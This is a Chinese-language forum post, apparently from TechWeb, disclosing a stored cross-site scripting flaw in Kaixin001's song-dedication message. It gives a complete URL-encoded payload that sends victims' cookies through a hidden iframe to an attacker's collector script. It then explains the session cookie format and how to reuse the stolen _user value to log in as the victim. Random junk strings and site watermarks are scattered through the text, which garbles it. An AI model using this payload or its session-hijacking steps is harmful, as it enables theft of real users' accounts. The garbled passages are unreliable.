开心网(kaixin001.com)XSS漏洞

 

    漏洞描述：
;S6p(T-h)E4m　　开心网(www.kaixin001.com)，当你在给好友点歌时，你可以留言，而开心对用户留言的数据没有进行严格过滤，导致攻击者可以提交恶意代码，进行跨站攻击。攻击者利用该漏洞可以盗取开心网用户的cookie，然后利用Cookie欺骗冒充该用户进行账号登录。危害严重。(?'K1S.D-x

http://www.kaixin001.com/music/ordermusic.php?verify=××××_1006_××××_1228989163_×××××&musicid=32331139&musichost=×××××&mid=924962&orderuids=×××××&word=%3Cimg+src%3D%22x%22+onerror%3D%22document.write%28%27%3Ciframe+src%3Dhttp%3A%2F%2Fwww.×××××.com%2Fxss%2Fxsscu.asp%3F%27%2Bescape%28document.cookie%29%2B%27+width%3D0++height%3D0++border%3D0%3E%3C%2Fiframe%3E%27%29%22%3E%0D%0A&group=&quiet=1+U%R5G8V#c0q)y-B

,T"q,k:v;Z3y+P1r
　　verify参数作用是验证用户身份
m0Q"p!X+z+A8x+fTechWeb-技术社区　　musicid参数是给好友点播歌曲的ID号
$^9Y1\!a$e$S　　musichost是自己的开心网IDtech.techweb.com.cn7K,|5f-U%})I9t%F*A
　　orderuids是好友开心网ID;_*q9d/r$e(R/W.^
　　word是点歌时留言内容TechWeb-技术社区 h2I0s/k5C)T1i2L
　　group 用户组tech.techweb.com.cn1z9H+C!@/p$r(o
　　quiet 悄悄地(将不会出现在好友的动态中)
2W8Y)\"L2I,P1M　　word参数后可以加入精心构造的跨站代码。3Q.r2m3Y;q6y2H$b
　　盗取Cookie提交代码：
7_%q:u.h,}+y-q'n7p+e程序开发，操作系统，服务器，源码下载，Linux,Unix,BSD,PHP,Apach,asp,下载,源码,黑客,安全,技术社区,技术论坛

<img src="x" >tech.techweb.com.cn9Y"}1d t8u9H+s

-O%[#M)^9V
　　这段明文盗取COOKIE代码，你要转化为URL编码后再提交。TechWeb-技术社区!s/P8]/V+q-b
　　当点歌成功后，恶意代码将以系统消息的形式，发送给受害者。系统会告诉受害者，你的朋友×××给你点了一首歌。 }/W/U.{2u
　　开心网的COOKIE(其实是Session)格式如下:
;Y'g;`7O(W(p

SERVERID=_srv102-125_; 0[4c"M1Z*n k!@,d6t_user=3b45065b00978846edecd20e6dae7710_×××××_1226381918;:p%q1};a)y1e'n _email=×××××%40126.com; _invisible=0TechWeb-技术社区5C"f%v/]'K.\#p%N.]

TechWeb-技术社区!Y&v'~&f$m5a']6`
　　你只要把_user中的参数替换掉，就可以利用受害者的帐号进行登录了。